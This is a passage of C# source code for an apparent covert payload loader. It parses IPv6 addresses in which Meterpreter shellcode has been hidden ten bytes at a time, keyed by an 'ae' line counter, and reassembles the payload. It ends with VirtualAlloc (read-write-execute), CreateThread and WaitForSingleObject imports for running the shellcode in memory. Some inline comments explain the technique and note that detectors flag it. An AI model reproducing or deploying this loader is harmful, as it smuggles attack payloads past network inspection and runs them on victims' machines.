temp_normalize0[ix].Length; 291 | Console.ForegroundColor = ConsoleColor.DarkGreen; 292 | if (count < 4) 293 | { 294 | Console.ForegroundColor = ConsoleColor.Green; 295 | for (int j = 0; j < 4 - count; j++) 296 | { 297 | temp_normalize0[ix] = "0" + temp_normalize0[ix]; 298 | } 299 | } 300 | if (ix == temp_normalize0.Length - 1) { Console.ForegroundColor = ConsoleColor.DarkCyan; } 301 | if (ix < temp_normalize0.Length - 6 && ix >= temp_normalize0.Length - 8) { Console.ForegroundColor = ConsoleColor.DarkCyan; } 302 | if (ix == temp_normalize0.Length - 2 || ix == temp_normalize0.Length - 3 || ix == temp_normalize0.Length - 4 || ix == temp_normalize0.Length - 5 || ix == temp_normalize0.Length - 6) 303 | { 304 | //// dump Injected Payloads from IPv6 Address to List ;) 305 | //// Note this code supported only 99 * 10 = 990 bytes payload 306 | //// you can change here to getting more than 990 bytes 307 | 308 | if (temp_normalize0[7].StartsWith("ae")) 309 | { 310 | object[] __X = {Convert.ToInt32(temp_normalize0[7].Remove(0,2)), temp_normalize0[ix]}; 311 | _IPV6_IPAddress_Payloads.Rows.Add(__X); 312 | 313 | } else if(temp_normalize0[7].StartsWith("0ae")) 314 | { 315 | object[] __X = {Convert.ToInt32(temp_normalize0[7].Remove(0,3)), temp_normalize0[ix]}; 316 | _IPV6_IPAddress_Payloads.Rows.Add(__X); 317 | } 318 | 319 | //// you can change here to getting more than 990 bytes 320 | 321 | //else if (temp_normalize0[7].StartsWith("a")) 322 | //{ 323 | // object[] __X = { Convert.ToInt32(temp_normalize0[7].Remove(0, 1)), temp_normalize0[ix] }; 324 | // _IPV6_IPAddress_Payloads.Rows.Add(__X); 325 | //} 326 | } 327 | 328 | Console.Write(temp_normalize0[ix] + " "); 329 | 330 | // checking Bytes and Sorting 331 | last_octet_tmp = ""; 332 | if (ix == temp_normalize0.Length - 1) 333 | { 334 | // this is last octet of IPv6 address 335 | last_octet_tmp += temp_normalize0[ix]; 336 | 337 | } 338 | } 339 | // Debug only {show address line 0} 340 | Console.Write(" ==> " + result_Line0); 341 
| Console.WriteLine(); 342 | //last_octet_tmp = String.Format("{0:x2}{1:x2}{2:x2}"); 343 | try 344 | { 345 | if (last_octet_tmp.StartsWith("ae")) 346 | { 347 | 348 | PayloadLines_current_id = Convert.ToInt32(last_octet_tmp.ToString().Remove(0, 2)); 349 | 350 | Final_payload_count++; 351 | } 352 | else if (last_octet_tmp.StartsWith("0ae")) 353 | { 354 | 355 | PayloadLines_current_id = Convert.ToInt32(last_octet_tmp.ToString().Remove(0, 3)); 356 | 357 | Final_payload_count++; 358 | } 359 | } 360 | catch (Exception e0) 361 | { 362 | 363 | Console.WriteLine("e0 : " + e0.Message); 364 | } 365 | /// Getting First Line of Meterpreter Payload Lines ;) 366 | /// Getting First Line of Meterpreter Payload Lines ;) 367 | 368 | } 369 | catch (Exception e00) 370 | { 371 | Console.WriteLine("e00 : " + e00.Message); 372 | 373 | } 374 | 375 | 376 | 377 | 378 | /// Getting Line by Line Payloads ;) 379 | /// line17 ==> fe80:1111:1c49:1d0:418b:488:4801:ae17 380 | /// line18 ==> fe80:1111:d041:5841:585e:595a:4158:ae18 381 | /// fe80:1111:4a4a:4d31:c948:31c0:ac3c:ae4 ====> {fe80:1111:}{4a4a:4d31:c948:31c0:ac3c}{:ae4} 382 | /// Static Address octet = {fe80:1111:} , Payload [10 bytes] = {4a4a:4d31:c948:31c0:ac3c} , Counter Lines = {:ae4} 383 | /// Getting Line by Line Payloads ;) 384 | try 385 | { 386 | string result_Line_X = ""; 387 | int end = 0; 388 | for (int xx = breakpoint_1+1 ; xx < All_lines.Length; xx++ ) 389 | { 390 | if (xx < All_lines.Length) 391 | { 392 | end = All_lines[xx].LastIndexOf("\r\n"); 393 | } 394 | else if (xx == All_lines.Length - 1) 395 | { 396 | end = All_lines[xx].LastIndexOf("\r\n\r\n"); 397 | } 398 | result_Line_X = All_lines[xx].Substring(2, end - 2); 399 | Console.WriteLine(); 400 | Console.ForegroundColor = ConsoleColor.DarkGreen; 401 | 402 | // Debug only {show address} 403 | //Console.WriteLine(result_Line_X); 404 | 405 | 406 | 407 | 408 | /// normalize Address 0:0:0 ==> 0000:0000:0000 409 | /// normalize Address 0:0:0 ==> 0000:0000:0000 410 | string[] 
temp_normalize = result_Line_X.Split(':'); 411 | 412 | /// finding hidden zero in adress octets ;) 413 | for (int ix = 0; ix < temp_normalize.Length; ix++) 414 | { 415 | int count = temp_normalize[ix].Length; 416 | Console.ForegroundColor = ConsoleColor.DarkGreen; 417 | if (count < 4) 418 | { 419 | Console.ForegroundColor = ConsoleColor.Green; 420 | for (int j = 0; j < 4 - count; j++) 421 | { 422 | temp_normalize[ix] = "0" + temp_normalize[ix]; 423 | } 424 | } 425 | if (ix == temp_normalize.Length - 1) { Console.ForegroundColor = ConsoleColor.DarkCyan; } 426 | if (ix < temp_normalize.Length - 6 && ix >= temp_normalize.Length - 8) { Console.ForegroundColor = ConsoleColor.DarkCyan; } 427 | if (ix == temp_normalize.Length - 2 || ix == temp_normalize.Length - 3 || ix == temp_normalize.Length - 4 || ix == temp_normalize.Length - 5 || ix == temp_normalize.Length - 6) 428 | { 429 | //// dump Injected Payloads from IPv6 Address to List ;) 430 | //// Note this code supported only 99 * 10 = 990 bytes payload 431 | //// you can change here to getting more than 990 bytes 432 | 433 | if (temp_normalize[7].StartsWith("ae")) 434 | { 435 | object[] __X = { Convert.ToInt32(temp_normalize[7].Remove(0, 2)), temp_normalize[ix] }; 436 | _IPV6_IPAddress_Payloads.Rows.Add(__X); 437 | 438 | } 439 | else if (temp_normalize[7].StartsWith("0ae")) 440 | { 441 | object[] __X = { Convert.ToInt32(temp_normalize[7].Remove(0, 3)), temp_normalize[ix] }; 442 | _IPV6_IPAddress_Payloads.Rows.Add(__X); 443 | } 444 | //// you can change here to getting more than 990 bytes 445 | 446 | //else if (temp_normalize[7].StartsWith("a")) 447 | //{ 448 | // object[] __X = { Convert.ToInt32(temp_normalize[7].Remove(0, 1)), temp_normalize[ix] }; 449 | // _IPV6_IPAddress_Payloads.Rows.Add(__X); 450 | //} 451 | 452 | } 453 | Console.Write(temp_normalize[ix] + " "); 454 | 455 | 456 | // checking Bytes and Sorting 457 | last_octet_tmp = ""; 458 | if (ix == temp_normalize.Length - 1) 459 | { 460 | // this is last octet 
of IPv6 address 461 | last_octet_tmp += temp_normalize[ix]; 462 | 463 | } 464 | } 465 | // Debug only {show address} 466 | Console.WriteLine(" ==> " + result_Line_X); 467 | //Console.WriteLine(); 468 | try 469 | { 470 | //last_octet_tmp = String.Format("{0:x2}{1:x2}{2:x2}"); 471 | if (last_octet_tmp.StartsWith("ae")) 472 | { 473 | 474 | PayloadLines_current_id = Convert.ToInt32(last_octet_tmp.ToString().Remove(0, 2)); 475 | 476 | Final_payload_count++; 477 | } 478 | else if (last_octet_tmp.StartsWith("0ae")) 479 | { 480 | 481 | PayloadLines_current_id = Convert.ToInt32(last_octet_tmp.ToString().Remove(0, 3)); 482 | 483 | Final_payload_count++; 484 | } 485 | } 486 | catch (Exception e1) 487 | { 488 | Console.WriteLine("e1 : " + e1.Message); 489 | 490 | } 491 | /// normalize Address 0:0:0 ==> 0000:0000:0000 492 | /// normalize Address 0:0:0 ==> 0000:0000:0000 493 | } 494 | Console.WriteLine("PAYLOAD Lines Count: "+Final_payload_count.ToString()); 495 | } 496 | catch (Exception e4) 497 | { 498 | 499 | Console.WriteLine("e4 : " + e4.Message); 500 | } 501 | 502 | } 503 | catch (Exception e) 504 | { 505 | 506 | Console.WriteLine(e.Message); 507 | 508 | 509 | } 510 | 511 | } 512 | 513 | 514 | /* Win32 constants and P/Invoke signatures for the in-memory execution stage; the call site is outside this excerpt. MEM_COMMIT (0x1000) is VirtualAlloc's allocation type; PAGE_EXECUTE_READWRITE (0x40) requests a page that is both writable and executable. An RWX allocation followed by CreateThread is a well-known indicator that endpoint monitoring and memory scanners key on. */ 515 | public static UInt32 MEM_COMMIT = 0x1000; 516 | public static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 517 | 518 | /* NOTE(review): pointer-sized arguments and return values are declared as UInt32 in these three imports, so the signatures only line up in a 32-bit process. */ [DllImport("kernel32")] 519 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 520 | /* Creates a thread that begins at lpStartAddress; lpThreadId receives the new thread's id. */ [DllImport("kernel32")] 521 | private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 522 | /* Blocks the caller until hHandle is signalled or dwMilliseconds elapses. */ [DllImport("kernel32")] 523 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 524 | 525 | } 526 | } 527 | --------------------------------------------------------------------------------